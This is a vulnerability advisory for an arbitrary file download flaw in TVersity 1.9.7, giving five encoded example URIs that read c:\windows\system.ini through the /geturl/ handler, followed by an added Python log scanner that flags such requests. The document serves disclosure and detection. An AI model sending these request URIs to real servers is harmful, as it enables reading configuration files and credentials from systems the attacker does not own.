TVersity Arbitrary File Download Vulnerability
BID:52512
Info
| Bugtraq ID: | 52512 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 15 2012 12:00AM |
| Updated: | Mar 15 2012 12:00AM |
| Credit: | Luigi Auriemma |
| Vulnerable: | TVersity 1.9.7 |
| Not Vulnerable: | |
Discussion
TVersity is prone to an arbitrary file download vulnerability because its /geturl/ handler fails to sufficiently sanitize the user-supplied url and ext parameters: a url value that uses the file:// scheme is read from the server's local filesystem and returned to the client as if it were a remote media stream.
An attacker can exploit this issue to download any file readable by the account running the TVersity web server process. Information obtained (configuration files, credentials, source) may aid in further attacks.
TVersity 1.9.7 is vulnerable; other versions may also be affected.
Exploit / POC
No special tooling is required; attackers can exploit this issue with a browser pointed at the TVersity web port (41952 in the examples below).
The following example URIs, each of which retrieves c:\windows\system.ini through the /geturl/ handler by way of a file:// url parameter, are available:
http://www.example.com:41952/geturl/.%3ftype%3daudio%252fmpeg%26url%3dfile://c:/windows/&ext=system.ini
http://www.example.com:41952/geturl/%2e?type=audio/mpeg&url=file://c:/windows/&ext=system.ini
http://www.example.com:41952/geturl/%2e?type=audio/mpeg&url=file://c:/windows/system.ini&ext=.
http://www.example.com:41952/geturl/system.ini.ini?type=audio/mpeg&url=file://c:/windows/&ext=.ini
http://www.example.com:41952/geturl/c:\windows\system.ini.mp3?type=audio/mpeg&url=file://&ext=.ini
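The five example URIs reach the same file by different encodings: the first one carries the entire query string inside the path with a double-encoded slash (%252f), the second and third use %2e for the dot, and the last one puts a Windows drive path in the URL path itself with url=file:// left empty. A detector that matches literal strings will miss most of them. The following is an added example (not part of the advisory and not TVersity code) in Python that takes request targets from web server or proxy log lines, percent-decodes them to a fixed point, and flags /geturl/ requests whose url parameter uses the file: scheme or that contain a drive-letter path. The five request targets are the advisory's own; the log line format, client addresses and the benign http:// request are constructed for the example, since TVersity itself is not assumed to produce such a log.

```python
"""Flag TVersity /geturl/ arbitrary-file-download attempts in request logs.

Added example, not from the advisory or from TVersity. The POC_TARGETS
are the advisory's example URIs; everything else here is constructed.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Request targets taken from the advisory's example URIs.
POC_TARGETS = [
    "/geturl/.%3ftype%3daudio%252fmpeg%26url%3dfile://c:/windows/&ext=system.ini",
    "/geturl/%2e?type=audio/mpeg&url=file://c:/windows/&ext=system.ini",
    "/geturl/%2e?type=audio/mpeg&url=file://c:/windows/system.ini&ext=.",
    "/geturl/system.ini.ini?type=audio/mpeg&url=file://c:/windows/&ext=.ini",
    "/geturl/c:\\windows\\system.ini.mp3?type=audio/mpeg&url=file://&ext=.ini",
]
# Constructed benign request: a remote http:// stream, the handler's intended use.
BENIGN_TARGET = "/geturl/track.mp3?type=audio/mpeg&url=http://192.0.2.20/music/track.mp3&ext=.mp3"

# Constructed combined-log-format lines, as a reverse proxy or sensor in front
# of port 41952 might record them (assumption: TVersity logs nothing like this).
SAMPLE_LOG = "\n".join(
    f'192.0.2.10 - - [15/Mar/2012:12:00:{i:02d} +0000] "GET {t} HTTP/1.1" 200 219'
    for i, t in enumerate(POC_TARGETS + [BENIGN_TARGET])
) + '\n192.0.2.11 - - [15/Mar/2012:12:01:00 +0000] "GET /index.html HTTP/1.1" 200 512\n'

REQUEST_LINE = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/')
# A lone drive letter followed by a path separator in either slash style;
# the lookbehind stops "p:/" inside "http://" from matching.
LOCAL_PATH = re.compile(r"(?<![a-z])[a-z]:[\\/]", re.IGNORECASE)


def fully_decode(s, max_rounds=5):
    """Percent-decode until nothing changes.

    The first advisory URI hides the whole query string in the path behind a
    double-encoded slash (%252f); a single unquote() would leave it opaque.
    """
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def analyse_request(target):
    """Return None for non-/geturl/ requests, else a list of reasons (empty = clean)."""
    parts = urlsplit(fully_decode(target))
    if not parts.path.lower().startswith("/geturl/"):
        return None
    reasons = []
    query = parse_qs(parts.query, keep_blank_values=True)
    url_values = [v.lower() for v in query.get("url", [])]
    if any(v.startswith("file:") for v in url_values):
        reasons.append("url parameter uses the file: scheme")
    if LOCAL_PATH.search(parts.path) or any(LOCAL_PATH.search(v) for v in url_values):
        reasons.append("local filesystem path (drive letter) in request")
    return reasons


def scan_log(text):
    """Return (target, reasons) for every flagged request line in a log blob."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_LINE.search(line)
        if not m:
            continue
        reasons = analyse_request(m.group(1))
        if reasons:
            hits.append((m.group(1), reasons))
    return hits


if __name__ == "__main__":
    for target, reasons in scan_log(SAMPLE_LOG):
        print(target, "->", "; ".join(reasons))
```

Decoding to a fixed point is deliberately more permissive than any single server's parser: the first URI only works because TVersity decodes the path before routing, and a detector should not have to know which round of decoding the target application applies. On the sample log the scan flags all five advisory requests and leaves the http:// stream and the unrelated GET alone.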
Solution / Fix
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
References:
- Luigi Auriemma: TVersity <= 1.9.7 Arbitrary File Download (original advisory)
- TVersity: TVersity Homepage (vendor)